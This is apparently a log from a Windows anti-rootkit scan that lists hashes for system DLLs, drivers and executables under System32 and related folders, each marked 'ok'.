12:17:18.0423 0x1aa8 [ 5D8E6C95156ED1F79A63D1EADE6F9ED5, 12130837D7F89A2C7E9D25747A8E5B9001E0A38D545178B49B450C23AE62664A ] C:\Windows\System32\setupapi.dll
12:17:18.0423 0x1aa8 C:\Windows\System32\setupapi.dll - ok
12:17:18.0426 0x1aa8 [ 1F8534A19A66275C863DE17645CB2A13, CA1DEEB1545E56EAA6CAABDF9F5950B414DEA85AB5E7D968505157345F34DC50 ] C:\Windows\System32\iertutil.dll
12:17:18.0426 0x1aa8 C:\Windows\System32\iertutil.dll - ok
12:17:18.0430 0x1aa8 [ 26036E228D2467DE6975AD819C22C043, B4A30EC7ABAEFFF55DE662F4A17415F2BD737BD563215638C86C580B8F3EA907 ] C:\Windows\System32\rpcrt4.dll
12:17:18.0430 0x1aa8 C:\Windows\System32\rpcrt4.dll - ok
12:17:18.0435 0x1aa8 [ 8D1196CFBB223621F2C67D45710F25BA, B5D7AFE51833B24FC9576F3AED3D8A2B290E5846060E73F9FFFAC1890A8B6003 ] C:\Windows\System32\drivers\usbhub.sys
12:17:18.0435 0x1aa8 C:\Windows\System32\drivers\usbhub.sys - ok
12:17:18.0440 0x1aa8 [ B4F29F65AD3114051F01E9403346047F, 7EB58545211C51E95B3F45C47C1F7CCE05B707D168E7C20F46D36E19EE3D8DFC ] C:\Windows\System32\imagehlp.dll
12:17:18.0440 0x1aa8 C:\Windows\System32\imagehlp.dll - ok
12:17:18.0444 0x1aa8 [ C06B32165E23A72A898B7A89679AD754, 721405158F6E9F1A7FE7BB33EF642D91332726629D0D3B07DF3CF3152A91C85D ] C:\Windows\System32\oleaut32.dll
12:17:18.0444 0x1aa8 C:\Windows\System32\oleaut32.dll - ok
12:17:18.0448 0x1aa8 [ D2A513EE880D71BDE7F0257F38B9D019, 7BDBFEA312061C0498E4C09EF5E4B3AAA23309E7448028F67EAA6F8F7188E871 ] C:\Windows\System32\kernel32.dll
12:17:18.0448 0x1aa8 C:\Windows\System32\kernel32.dll - ok
12:17:18.0452 0x1aa8 [ 9835E63E09F824D22B689D2BB789BAB9, 5BCFFAFB894D69FBCDDB91E64D30A356F4BD57098E8B4C51B98AFAF6581BDB63 ] C:\Windows\System32\comdlg32.dll
12:17:18.0452 0x1aa8 C:\Windows\System32\comdlg32.dll - ok
12:17:18.0456 0x1aa8 [ 28C0B5024F5C5A438E78B188CFC81B7F, AB81FB63F2908CE316B45609077ACBD85F4B2AAD1606B1E9030F06DB82EDDFAD ] C:\Windows\System32\normaliz.dll
12:17:18.0456 0x1aa8 C:\Windows\System32\normaliz.dll - ok
12:17:18.0460 0x1aa8 [ 4BBFA57F594F7E8A8EDC8F377184C3F0, 9F3AC5DEA5A6250C3DBB97AF79C81C0A48429486521F807355A1D7D3D861B75F ] C:\Windows\System32\ws2_32.dll
12:17:18.0460 0x1aa8 C:\Windows\System32\ws2_32.dll - ok
12:17:18.0464 0x1aa8 [ EAF32CB8C1F810E4715B4DFBE785C7FF, DB6AD07FDED42433E669508AB73FAFF6DAFF04575D6F1D016FE3EB6ECEC4DD5D ] C:\Windows\System32\shlwapi.dll
12:17:18.0464 0x1aa8 C:\Windows\System32\shlwapi.dll - ok
12:17:18.0468 0x1aa8 [ AA2C08CE85653B1A0D2E4AB407FA176C, 83DFD0C119B20AEDB07114C9D1CF9CE2DFA938D0F1070256B0591A9E2C3997FA ] C:\Windows\System32\imm32.dll
12:17:18.0468 0x1aa8 C:\Windows\System32\imm32.dll - ok
12:17:18.0474 0x1aa8 [ 796B47A4B82EF1C39F13435B88834C48, AFC3E89476BAAD8A71663F0DB8D15E00FF9D131F1306A2F69D728E3AD1184602 ] C:\Windows\System32\lpk.dll
12:17:18.0474 0x1aa8 C:\Windows\System32\lpk.dll - ok
12:17:18.0480 0x1aa8 [ 6C60B5ACA7442EFB794082CDACFC001C, FC1D9124856A70FF232EF3057D66BEE803295847624CE23B4D0217F23AF52C75 ] C:\Windows\System32\ole32.dll
12:17:18.0480 0x1aa8 C:\Windows\System32\ole32.dll - ok
12:17:18.0485 0x1aa8 [ 63A580C88CFAF72A92550940054569EF, A66C89123D1833446ACC31D5CF536B0D0EC24D2F805C022A637596CF98429D9F ] C:\Windows\System32\advapi32.dll
12:17:18.0485 0x1aa8 C:\Windows\System32\advapi32.dll - ok
12:17:18.0489 0x1aa8 [ DBF99FD9CAF75CA66D042BD8D050FF71, D11A863EAEDE80A731FD7A63F744E518D3921043CC3982BAA87992F9E82F044F ] C:\Windows\System32\usp10.dll
12:17:18.0489 0x1aa8 C:\Windows\System32\usp10.dll - ok
12:17:18.0493 0x1aa8 [ 25983DE69B57142039AC8D95E71CD9C9, A677DA7EBCBCB6073D27E8A38809F51E971E83ED379BC599AAAD6EF4216348DA ] C:\Windows\System32\clbcatq.dll
12:17:18.0493 0x1aa8 C:\Windows\System32\clbcatq.dll - ok
12:17:18.0497 0x1aa8 [ C431EAF5CAA1C82CAC2534A2EAB348A3, ADDF850128DC675E67FABA9A3D0D27E684F01F733962CA22927BB94503549E44 ] C:\Windows\System32\msctf.dll
12:17:18.0497 0x1aa8 C:\Windows\System32\msctf.dll - ok
12:17:18.0500 0x1aa8 [ FE70103391A64039A921DBFFF9C7AB1B, F7D219D75037BC98F6C69143B00AB6000A31F8B5E211E0AF514F4F4B681522A0 ] C:\Windows\System32\user32.dll
12:17:18.0500 0x1aa8 C:\Windows\System32\user32.dll - ok
12:17:18.0505 0x1aa8 [ 4E4FFB09D895AA000DD56D1404F69A7E, D999E04BB35780088480EAB322176570591A21E311D204BDCAB010A63B34D24C ] C:\Windows\System32\Wldap32.dll
12:17:18.0505 0x1aa8 C:\Windows\System32\Wldap32.dll - ok
12:17:18.0509 0x1aa8 [ 9028D1621C43DF8DFBD1C76860412A11, A1D48D9B33180BDE50D2FA9BB07E9520B7B7788C39B3AABB4A06AE4B1AACA755 ] C:\Windows\System32\comctl32.dll
12:17:18.0509 0x1aa8 C:\Windows\System32\comctl32.dll - ok
12:17:18.0513 0x1aa8 [ 2477A28081BDAEE622CF045ACF8EE124, 00A09CAF9129E84FEEA98FA03CE9012C9F961B64FEE15C4F268822C0F82ACC3C ] C:\Windows\System32\cfgmgr32.dll
12:17:18.0514 0x1aa8 C:\Windows\System32\cfgmgr32.dll - ok
12:17:18.0518 0x1aa8 [ 06FEC9E8117103BB1141A560E98077DA, C5E61B11DDBBBBBA3D9488970524F0975EA5FBDF16E2FA31F579F8BFA48353B1 ] C:\Windows\System32\devobj.dll
12:17:18.0518 0x1aa8 C:\Windows\System32\devobj.dll - ok
12:17:18.0524 0x1aa8 [ F49E92B50CED5C9F1725D3C0329FD933, 6155FA4D8242F07FC578FF746890C2EE19FC3D6A20ED8AE4C6F021DB2DAC184F ] C:\Windows\System32\api-ms-win-downlevel-advapi32-l1-1-0.dll
12:17:18.0524 0x1aa8 C:\Windows\System32\api-ms-win-downlevel-advapi32-l1-1-0.dll - ok
12:17:18.0528 0x1aa8 [ 64A4AB126E24FD3F58EBE64852773DB5, ED425BBC91EB8BEF54C363036A770C551C97EF324F1AE31049CA750D0E2D6776 ] C:\Windows\System32\api-ms-win-downlevel-normaliz-l1-1-0.dll
12:17:18.0528 0x1aa8 C:\Windows\System32\api-ms-win-downlevel-normaliz-l1-1-0.dll - ok
12:17:18.0532 0x1aa8 [ AFC3DB5C6EB8CA8017DDB81D6C0AD02A, 445C2857398252756FD25BB94DAFCCEFF573DE55F1F8BF9094C191F409FE6437 ] C:\Windows\System32\api-ms-win-downlevel-shlwapi-l1-1-0.dll
12:17:18.0532 0x1aa8 C:\Windows\System32\api-ms-win-downlevel-shlwapi-l1-1-0.dll - ok
12:17:18.0536 0x1aa8 [ 72723D3E4781BADC62C3180C137E7B23, 0BDA5292928578C5DA79C761E15B8A892B9D4A3DA26D3635E714797C653CF492 ] C:\Windows\System32\api-ms-win-downlevel-user32-l1-1-0.dll
12:17:18.0536 0x1aa8 C:\Windows\System32\api-ms-win-downlevel-user32-l1-1-0.dll - ok
12:17:18.0540 0x1aa8 [ 9094039A00485F71C4DE64BF51F64C46, 4ACFEF4C747ADF806A4FDEDDFD9CC48168DFB05075306C77D3F3927749DD7484 ] C:\Windows\System32\api-ms-win-downlevel-version-l1-1-0.dll
12:17:18.0540 0x1aa8 C:\Windows\System32\api-ms-win-downlevel-version-l1-1-0.dll - ok
12:17:18.0544 0x1aa8 [ 780F6ECC4F55D76C9730E6B6C9B31913, 1AEA642AFA210A672A92AAA49CFDE52D9E48ED41248F7644FAADE760E8A0E72E ] C:\Windows\System32\crypt32.dll
12:17:18.0544 0x1aa8 C:\Windows\System32\crypt32.dll - ok
12:17:18.0548 0x1aa8 [ 959041D7014C97133D859B45BCA0FC58, 282D34828DA7404470949483CB9789A8B4861D188093F0FBD07138A37F60B94B ] C:\Windows\System32\wintrust.dll
12:17:18.0548 0x1aa8 C:\Windows\System32\wintrust.dll - ok
12:17:18.0551 0x1aa8 [ 0E6FBF19D9DFBB77316C23DF91F8A101, 680F88E1BC55EA3342AACE6F2E3511BF877AC8F03276D028FEE84EEFE8B5611A ] C:\Windows\System32\api-ms-win-downlevel-ole32-l1-1-0.dll
12:17:18.0551 0x1aa8 C:\Windows\System32\api-ms-win-downlevel-ole32-l1-1-0.dll - ok
12:17:18.0555 0x1aa8 [ 851BB346CD59D9B3BC8854384C7DD5C3, 0CA1BCBDA6CB8CAC1186B3BE13C3937EDF46264FDFFCEBDF94C7EB10DE957DC6 ] C:\Windows\System32\KernelBase.dll
12:17:18.0555 0x1aa8 C:\Windows\System32\KernelBase.dll - ok
12:17:18.0559 0x1aa8 [ 884415BD4269C02EAF8E2613BF85500D, EFE771709EC942694FD206AC8D0A48ED7DCD35036F074268E4AECD68AC982CEA ] C:\Windows\System32\msasn1.dll
12:17:18.0559 0x1aa8 C:\Windows\System32\msasn1.dll - ok
12:17:18.0563 0x1aa8 [ 9C278785347BCC991F8EA2999D90F58D, EA680C3642A6ABF627415AEE019956FAC702DC6A8F4B4D0FC8A4FB21EADD3896 ] C:\Windows\SysWOW64\normaliz.dll
12:17:18.0563 0x1aa8 C:\Windows\SysWOW64\normaliz.dll - ok
12:17:18.0566 0x1aa8 [ 015C0D8E0E0421B4CFD48CFFE2825879, 4242E2D42CCFC859B2C0275C5331798BC0BDA68E51CF4650B6E64B1332071023 ] C:\Windows\System32\drivers\ndproxy.sys
12:17:18.0566 0x1aa8 C:\Windows\System32\drivers\ndproxy.sys - ok
12:17:18.0570 0x1aa8 [ E0D3CD5841E5C7BE7B94BA946AF1E498, 4EAE1B226255623DA41A047633994D6902F6D4CA5757BF5D85E227378336227F ] C:\Windows\System32\drivers\drmk.sys
12:17:18.0570 0x1aa8 C:\Windows\System32\drivers\drmk.sys - ok
12:17:18.0574 0x1aa8 [ 1E0B4CBBA91C6B041A14ECC2186F7E24, 63039A317F906454A0652704DA2D646658A148B9B55BFB5D2F4B27997F357DF9 ] C:\Windows\System32\drivers\portcls.sys
12:17:18.0574 0x1aa8 C:\Windows\System32\drivers\portcls.sys - ok
12:17:18.0578 0x1aa8 [ FB0274E54956158657E80BEC8F442ED3, 7048174B31176B1751A11F7A9C1BDBFBD56CB7AE42C033B8BBABCFBCFADCDE3D ] C:\Windows\System32\drivers\stwrt64.sys
12:17:18.0578 0x1aa8 C:\Windows\System32\drivers\stwrt64.sys - ok
12:17:18.0581 0x1aa8 [ FC727061C0F47C8059E88E05D5C8E381, C7A3782F5D86C7FDE57AA1F2EE81638C5FC3072ACC6E572BA2EC7B3CFF389800 ] C:\Windows\System32\drivers\IntcDAud.sys
12:17:18.0581 0x1aa8 C:\Windows\System32\drivers\IntcDAud.sys - ok
12:17:18.0585 0x1aa8 [ 1ACB3F124140A2EAB5A1E36286E37C0D, C0D00E1BF4D501A1D6DC97B9DE378867C9FDEFF6B4E17054DC1F1EC8F958D4C8 ] C:\Windows\System32\drivers\FLxHCIh.sys
12:17:18.0585 0x1aa8 C:\Windows\System32\drivers\FLxHCIh.sys - ok
12:17:18.0588 0x1aa8 [ BF24D6F2ED97FE830BFD52B246F98E67, 6BBF4C4221A245462EF653798F6B416EEB12594AD1CB4E8BC8908A8CB2F53384 ] C:\Windows\System32\drivers\dxapi.sys
12:17:18.0588 0x1aa8 C:\Windows\System32\drivers\dxapi.sys - ok
12:17:18.0592 0x1aa8 [ E918C0DE5CF2AE6BEDBF387C09627D93, B45B0CE2BDD41CD46DE2AC76CF7753DF38C29435DCF833B5CFF1DB9329559F3C ] C:\Windows\System32\win32k.sys
12:17:18.0592 0x1aa8 C:\Windows\System32\win32k.sys - ok
12:17:18.0595 0x1aa8 [ BA0CD8C393E8C9F83354106093832C7B, 18D8A4780A2BAA6CEF7FBBBDA0EF6BF2DADF146E1E578A618DD5859E8ADBF1A8 ] C:\Windows\System32\basesrv.dll
12:17:18.0596 0x1aa8 C:\Windows\System32\basesrv.dll - ok
12:17:18.0599 0x1aa8 [ 216BABD555BC550952320EEA89C25DDF, 1BBB92415280032CD18F361382A69D0D91266AAD56FC88A99C804B0053743D72 ] C:\Windows\System32\csrsrv.dll
12:17:18.0599 0x1aa8 C:\Windows\System32\csrsrv.dll - ok
12:17:18.0602 0x1aa8 [ 60C2862B4BF0FD9F582EF344C2B1EC72, CB1C6018FC5C15483AC5BB96E5C2E2E115BB0C0E1314837D77201BAB37E8C03A ] C:\Windows\System32\csrss.exe
12:17:18.0602 0x1aa8 C:\Windows\System32\csrss.exe - ok
12:17:18.0605 0x1aa8 [ 88EDD0B34EED542745931E581AD21A32, DC2B93E1CEF5B0BCEE08D72669BB0F3AD0E8E6E75BDC08858407ED92F6FFA031 ] C:\Windows\System32\winsrv.dll
12:17:18.0605 0x1aa8 C:\Windows\System32\winsrv.dll - ok
12:17:18.0610 0x1aa8 [ B03D591DC7DA45ECE20B3B467E6AADAA, 701FB0CAD8138C58507BE28845D3E24CE269A040737C29885944A0D851238732 ] C:\Windows\System32\drivers\monitor.sys
12:17:18.0610 0x1aa8 C:\Windows\System32\drivers\monitor.sys - ok
12:17:18.0613 0x1aa8 [ D6160F9D869BA3AF0B787F971DB56368, 0033E6212DD8683E4EE611B290931FDB227B4795F0B17C309DC686C696790529 ] C:\Windows\System32\sxssrv.dll
12:17:18.0613 0x1aa8 C:\Windows\System32\sxssrv.dll - ok
12:17:18.0617 0x1aa8 [ F29FE765E1448EF371CFE05BFAC74ADB, F251581222D78543272FD4B14A6A59F4B0E0CC44A5FCBCF56DE4CA5783F78A75 ] C:\Windows\System32\tsddd.dll
12:17:18.0617 0x1aa8 C:\Windows\System32\tsddd.dll - ok
12:17:18.0620 0x1aa8 [ 2C942733A5983DD4502219FF37C7EBC7, 34B20B6B0D7274E4B5B783F1D2345BC3DD9888964D5C2C65712F041A00CF5B45 ] C:\Windows\System32\profapi.dll
12:17:18.0620 0x1aa8 C:\Windows\System32\profapi.dll - ok
12:17:18.0622 0x1aa8 [ 94355C28C1970635A31B3FE52EB7CEBA, C4E98F07170CEC69CACDD5CEDB8927E48A2A299CB1B8CDA87526E768AF6174F0 ] C:\Windows\System32\wininit.exe
12:17:18.0622 0x1aa8 C:\Windows\System32\wininit.exe - ok
12:17:18.0626 0x1aa8 [ 78523A26F5604C0568FE9D1CE86E36F4, 534A7228BF69719106F581616A32EAEF0B770DDB36DCE94F84E7D52FDB1382B5 ] C:\Windows\System32\KBDUS.DLL
12:17:18.0626 0x1aa8 C:\Windows\System32\KBDUS.DLL - ok
12:17:18.0629 0x1aa8 [ C2A8CB1275ECB85D246A9ECC02A728E3, 3603FADCA0060BD201148F9D59E4E2627F024609A6463AB525B5D1AD17BDCD10 ] C:\Windows\System32\RpcRtRemote.dll
12:17:18.0630 0x1aa8 C:\Windows\System32\RpcRtRemote.dll - ok
12:17:18.0633 0x1aa8 [ 05569A79BF4693670B709144382D02D4, 3B13C569EE4FBC63C6989A7A12A50DCCC945FAB26C6E659DEB0614640E8F40C3 ] C:\Windows\System32\cdd.dll
12:17:18.0633 0x1aa8 C:\Windows\System32\cdd.dll - ok
12:17:18.0636 0x1aa8 [ B26B1801356760841C3BC69F9F91537F, 83B9DF333E36C09E81D44E12AE5BE14650126FDA0CF4A0EA853BF40C5780EF81 ] C:\Windows\System32\WlS0WndH.dll
12:17:18.0636 0x1aa8 C:\Windows\System32\WlS0WndH.dll - ok
12:17:18.0639 0x1aa8 [ 9CEAD32E79A62150FE9F8557E58E008B, AFE4C1725EE94D7DE0749AE1495A4E5CC33C369F29B2A589DA66FFE27FF9777E ] C:\Windows\System32\sxs.dll
12:17:18.0640 0x1aa8 C:\Windows\System32\sxs.dll - ok
12:17:18.0643 0x1aa8 [ 784FA3DF338E2E8F5F0389D6FAC428AF, 9C8AA0CFDEB9E38AAF8EB08626070E0F0364F4F8A793CFE3532EC6C007980C34 ] C:\Windows\System32\cryptbase.dll
12:17:18.0643 0x1aa8 C:\Windows\System32\cryptbase.dll - ok
12:17:18.0647 0x1aa8 [ 90499F3163A9F815CF196A205EA3CD5D, 29B4ED3795CEC1177EB367132914CE21C194CDEC5DB9DC923FD928C85E94D821 ] C:\Windows\System32\apphelp.dll
12:17:18.0647 0x1aa8 C:\Windows\System32\apphelp.dll - ok
12:17:18.0650 0x1aa8 [ 24ACB7E5BE595468E3B9AA488B9B4FCB, 63541E3432FCE953F266AE553E7A394978D6EE3DB52388D885F668CF42C5E7E2 ] C:\Windows\System32\services.exe
12:17:18.0650 0x1aa8 C:\Windows\System32\services.exe - ok
12:17:18.0654 0x1aa8 [ 9358149234A4F3FE00CF5C2096DC1652, 14A9C7102BBF4E4E706BAE13C04F59FAFB2ED5E1D90984C64815310B538F6649 ] C:\Windows\System32\lsasrv.dll
12:17:18.0654 0x1aa8 C:\Windows\System32\lsasrv.dll - ok
12:17:18.0657 0x1aa8 [ 204F3F58212B3E422C90BD9691A2DF28, D748A8CEE4D59B4248C9B1ACA5155D0FF6635A29564B4391B7FAC6261F93FE99 ] C:\Windows\System32\lsass.exe
12:17:18.0657 0x1aa8 C:\Windows\System32\lsass.exe - ok
12:17:18.0662 0x1aa8 [ 9662EE182644511439F1C53745DC1C88, D205B2C163E78AB42A5D67D7664EF6B75EA0374FF0924467D624F9DB0611F0AD ] C:\Windows\System32\lsm.exe
12:17:18.0662 0x1aa8 C:\Windows\System32\lsm.exe - ok
12:17:18.0665 0x1aa8 [ 8098627D0AA1706D69C5AF3F74332ABB, 9582F6162A8405DC568FFBEA08A9090FE92FE2C9DB640077BD7F23AC4FABF700 ] C:\Windows\System32\sspisrv.dll
12:17:18.0666 0x1aa8 C:\Windows\System32\sspisrv.dll - ok
12:17:18.0669 0x1aa8 [ DCA68B0943D6FA415F0C56C92158A83A, BEE5A5B33B22D1DF50B884D46D89FC3B8286EB16E38AD5A20F0A49E5C6766C57 ] C:\Windows\System32\drivers\usbccgp.sys
12:17:18.0669 0x1aa8 C:\Windows\System32\drivers\usbccgp.sys - ok
12:17:18.0672 0x1aa8 [ E914A50A151DFFE63D3935226DB5E2C1, 7DCCE4060344E1C771679F1C20378A0BEB3C1F06DB684072F07B98921A62A299 ] C:\Windows\System32\scext.dll
12:17:18.0673 0x1aa8 C:\Windows\System32\scext.dll - ok
12:17:18.0676 0x1aa8 [ C072064F95579C0D6D86AF5B3DC53192, CF4A088DF97F4D4963BEAB9CBDBF69FEA2D4773159054A0AF8B8DFFDF83E18DA ] C:\Windows\System32\sspicli.dll
12:17:18.0676 0x1aa8 C:\Windows\System32\sspicli.dll - ok
12:17:18.0680 0x1aa8 [ 68083118797CAF30FB2EA3E71494D67E, 5F1BCDFCB00A20CD60CBC70A2FD97405EF0F7173DD0E404BBA7B06D39DB37364 ] C:\Windows\System32\sysntfy.dll
12:17:18.0680 0x1aa8 C:\Windows\System32\sysntfy.dll - ok
12:17:18.0683 0x1aa8 [ DEE7267C5D232A3B816866872CE199E6, A1994FD37667C52E7CBF873514C190DA61A3D1349786D187BFAE0006F61799AE ] C:\Windows\System32\wmsgapi.dll
12:17:18.0683 0x1aa8 C:\Windows\System32\wmsgapi.dll - ok
12:17:18.0686 0x1aa8 [ BBCDF350817BA86416C0F06B6981BE8D, D064438F97852B9BD6015C8B19377C61C671E0969E09506B8359FE7B1F373A61 ] C:\Windows\System32\scesrv.dll
12:17:18.0686 0x1aa8 C:\Windows\System32\scesrv.dll - ok
12:17:18.0690 0x1aa8 [ 39312B37C5FE5138F99680A49ACD3AEA, B9566B4117FBBECF77A0D3F49E9DF302088B9D483F817720B22E4F9C5754264A ] C:\Windows\System32\secur32.dll
12:17:18.0690 0x1aa8 C:\Windows\System32\secur32.dll - ok
12:17:18.0695 0x1aa8 [ 3A9C9BAF610B0DD4967086040B3B62A9, E8E9A0F42B1EE7806EDCEED08AA024D037215D06CA317E3678BD5364AD513D23 ] C:\Windows\System32\srvcli.dll
12:17:18.0695 0x1aa8 C:\Windows\System32\srvcli.dll - ok
12:17:18.0699 0x1aa8 [ A744BA6E04C8AA4592818178DBF89521, 9E7C85D842DF16F9B8FED7B06AF309B5ECCBFD465F5552347D4C3F1FEFDC6F7A ] C:\Windows\System32\samsrv.dll
12:17:18.0699 0x1aa8 C:\Windows\System32\samsrv.dll - ok
12:17:18.0702 0x1aa8 [ 3A061472B38233BAFF9CFEFF2E49C46B, DF29B14C8D22A8A16AA336A09A6152E2C7FCA6CAF4E76F0C5DCB55BEF9D00515 ] C:\Windows\System32\cryptdll.dll
12:17:18.0702 0x1aa8 C:\Windows\System32\cryptdll.dll - ok
12:17:18.0706 0x1aa8 [ 3C073B0C596A0AF84933E7406766B040, 4698BBA678F553E15AD4B07AD7FB236281F872DEFEE97BFD637114476C8F97B3 ] C:\Windows\System32\wevtapi.dll
12:17:18.0706 0x1aa8 C:\Windows\System32\wevtapi.dll - ok
12:17:18.0709 0x1aa8 [ 7FBEBD2229EA5FD48D41B199EC2D541C, A465975D445A8D50CAF3EF29BD33354B320D11173C127BE30D5EBBFF7008CDCE ] C:\Windows\System32\authz.dll
12:17:18.0710 0x1aa8 C:\Windows\System32\authz.dll - ok
12:17:18.0713 0x1aa8 [ 86FE1B1F8FD42CD0DB641AB1CDB13093, 8C4BB4415105CE82FFFE658879EAE9D259A24C0F6DFC7D25507352DC99241BE2 ] C:\Windows\System32\cngaudit.dll
12:17:18.0713 0x1aa8 C:\Windows\System32\cngaudit.dll - ok
12:17:18.0717 0x1aa8 [ 747B9BA5412422F27934CB21131F0A3E, 2441F925C3B46A15141A0A1E1AA9DFCCA2891D823D55C6E6DA0E30C2DE3A7341 ] C:\Windows\System32\ncrypt.dll
12:17:18.0717 0x1aa8 C:\Windows\System32\ncrypt.dll - ok
12:17:18.0720 0x1aa8 [ B9A95365E52F421A20E1501935FADDA5, DDB4CB575139233EFAF2C59B7E9B04AF36BBCCC63190181F3B2A7E6BFC86E77E ] C:\Windows\System32\bcrypt.dll
12:17:18.0720 0x1aa8 C:\Windows\System32\bcrypt.dll - ok
12:17:18.0723 0x1aa8 [ 02B64609F865A39365FF88580DF11738, 2F676B93898E1B6131AF6227BB7AB731EB9C29477F9BD4C2C60F0FC1E35CD968 ] C:\Windows\System32\msprivs.dll
12:17:18.0723 0x1aa8 C:\Windows\System32\msprivs.dll - ok
12:17:18.0727 0x1aa8 [ 50532FCD7ECF02DD169CE5C485F02534, 8EE5D9D0EA53DC72BCC300692E521ACADD56AB09BFA3E78149D8B5A90648512C ] C:\Windows\System32\negoexts.dll
12:17:18.0727 0x1aa8 C:\Windows\System32\negoexts.dll - ok
12:17:18.0731 0x1aa8 [ C6505DE3561537BA1004D638C2F93F2F, 3E4FDF374B1A9E43A8F61FD2D79E0515390ECABFDAF72C4BD44A7B6429039AF6 ] C:\Windows\System32\netjoin.dll
12:17:18.0731 0x1aa8 C:\Windows\System32\netjoin.dll - ok
12:17:18.0734 0x1aa8 [ B19C8390A1D641B9AC4490D4828A7B5E, 23F376D3BC09C95D7FE4729EDD907F06A96E4AD296D33588839382224361C0FC ] C:\Windows\System32\kerberos.dll
12:17:18.0734 0x1aa8 C:\Windows\System32\kerberos.dll - ok
12:17:18.0738 0x1aa8 [ D0C2FBB6D97416B0166478FC7AE2B212, 7EAB6C37F0A845E645CA44CC060AC6C56E386C7EF7A64716C6786C9602AD8C9D ] C:\Windows\System32\cryptsp.dll
12:17:18.0738 0x1aa8 C:\Windows\System32\cryptsp.dll - ok
12:17:18.0741 0x1aa8 [ 9A9F9F1A77D6A80EE28B57664F00013E, 0D441638E086EF1342FCDC43E826BF9E9CC6B2E8AE100D89BFC70163F987DE91 ] C:\Windows\System32\mswsock.dll
12:17:18.0741 0x1aa8 C:\Windows\System32\mswsock.dll - ok
12:17:18.0744 0x1aa8 [ EC7CBFF96B05ECF3D366355B3C64ADCF, F69ED45EBEDCA9CF000AC03281F0EC2C351F98513FBA90E63394E4E561D6C7A2 ] C:\Windows\System32\wship6.dll
12:17:18.0744 0x1aa8 C:\Windows\System32\wship6.dll - ok
12:17:18.0749 0x1aa8 [ E2A483E796D5FC7E447725FD01D98FA0, 78F7F253CE8391A9BD073AC507A55A29B562AFBB0154C2DA8F5E837CA8DE8B79 ] C:\Windows\System32\msv1_0.dll
12:17:18.0749 0x1aa8 C:\Windows\System32\msv1_0.dll - ok
12:17:18.0752 0x1aa8 [ AA339DD8BB128EF66660DFBBB59043D3, 76D9F849AFDDA38E04549EB67B4163478776F1B6EF46434168278F84FEB8FC5C ] C:\Windows\System32\netlogon.dll
12:17:18.0752 0x1aa8 C:\Windows\System32\netlogon.dll - ok
12:17:18.0756 0x1aa8 [ 492D07D79E7024CA310867B526D9636D, F2FE647AB85C6C3C1AA3DF4BCE6E4D42B9676C9D837E11388C235AE8DB20044F ] C:\Windows\System32\dnsapi.dll
12:17:18.0756 0x1aa8 C:\Windows\System32\dnsapi.dll - ok
12:17:18.0759 0x1aa8 [ 88AB9B72B4BF3963A0DE0820B4B0B06C, 29EFEADCB26E408CD41492FCEC6D411A018099D6FF5ECA9526ED59564975F3E6 ] C:\Windows\System32\winlogon.exe
12:17:18.0759 0x1aa8 C:\Windows\System32\winlogon.exe - ok
12:17:18.0763 0x1aa8 [ 8FFE297B8449386E7B6851458B6E474E, E149B37E11091D69D926242517E5655596594A6F01FEF06EB65D6BA5B354E326 ] C:\Windows\System32\logoncli.dll
12:17:18.0763 0x1aa8 C:\Windows\System32\logoncli.dll - ok
12:17:18.0767 0x1aa8 [ 481F70241D4EA038BB02590A30F15A23, 794418F8538BE8B90531C99C876D40625FC7C39FDCFCA9114843F44F9FE6D85C ] C:\Windows\System32\schannel.dll
12:17:18.0767 0x1aa8 C:\Windows\System32\schannel.dll - ok
12:17:18.0770 0x1aa8 [ 0D9764D58C5EFD672B7184854B152E5E, 9827B43DABBEC39AB2E2294408D9C5304EF27A684903C5234C6070387723D49E ] C:\Windows\System32\winsta.dll
12:17:18.0770 0x1aa8 C:\Windows\System32\winsta.dll - ok
12:17:18.0774 0x1aa8 [ 26AF184300C0868D854D5A3092234E24, 46FFF8B9212F2AE99D494A7BD1CDD5C95F451593B46CECAF25CE897931374250 ] C:\Windows\System32\wdigest.dll
12:17:18.0774 0x1aa8 C:\Windows\System32\wdigest.dll - ok
12:17:18.0777 0x1aa8 [ 5D8874A8C11DDDDE29E12DE0E2013493, 3E9A57137BF622AF83E3E4D58971E2C0200559CCA7545D16CF263AA03EE9C7D2 ] C:\Windows\System32\rsaenh.dll
12:17:18.0777 0x1aa8 C:\Windows\System32\rsaenh.dll - ok
12:17:18.0781 0x1aa8 [ B6D8C1202DACA028AD94BDA2795CBBE9, 967DA60ED456F6DC0D1D5F793DB947E81427811FA98BEF215A55F0171C204A12 ] C:\Windows\System32\TSpkg.dll
12:17:18.0781 0x1aa8 C:\Windows\System32\TSpkg.dll - ok
12:17:18.0785 0x1aa8 [ 7DBA64AD70C2E2481C68D9E0F7CD7840, 52EE57E9A8D3C28336BB8E7536ECE77A9FB4BAF93B9651F9A897F79F873D66BE ] C:\Windows\System32\LIVESSP.DLL
12:17:18.0785 0x1aa8 C:\Windows\System32\LIVESSP.DLL - ok
12:17:18.0788 0x1aa8 [ E08088A97F95345E181C3DFCE2C615EF, DEF3B087DF5E10E4F8418029DB6E82546E62FEFA39694B7BD6A48CE8AAFD1B96 ] C:\Windows\System32\pku2u.dll
12:17:18.0788 0x1aa8 C:\Windows\System32\pku2u.dll - ok
12:17:18.0792 0x1aa8 [ D6C7780A364C6BBACFA796BAB9F1B374, 3B5ED1A030BFD0BB73D4FFCD67A6A0B8501EF70293F223EFAA12F430ADF270F9 ] C:\Windows\System32\bcryptprimitives.dll
12:17:18.0792 0x1aa8 C:\Windows\System32\bcryptprimitives.dll - ok
12:17:18.0795 0x1aa8 [ 82A72E99AA1CF0B04D3B9843CBA3AEC1, 0CB811379A40A993544013FA36A9B49532A9954CD8CD0D376E3B740F028C90C4 ] C:\Windows\System32\credssp.dll
12:17:18.0795 0x1aa8 C:\Windows\System32\credssp.dll - ok
12:17:18.0799 0x1aa8 [ 90BDEFC5DF334E5100EAA781D798DE1A, F48B650D811B6D57D2252E326C0C9CC74534BE9D510E7D3403F91D1C5C36281E ] C:\Windows\System32\efslsaext.dll
12:17:18.0799 0x1aa8 C:\Windows\System32\efslsaext.dll - ok
12:17:18.0803 0x1aa8 [ 0124633DC4F25F2E1378F38115CE0A9A, A36914F7C85C41FFFA5E02EB1ACE984ACFD9834032686E531E0DC5825930979C ] C:\Program Files\WIDCOMM\Bluetooth Software\BtwProximityCP.dll
12:17:18.0803 0x1aa8 C:\Program Files\WIDCOMM\Bluetooth Software\BtwProximityCP.dll - ok
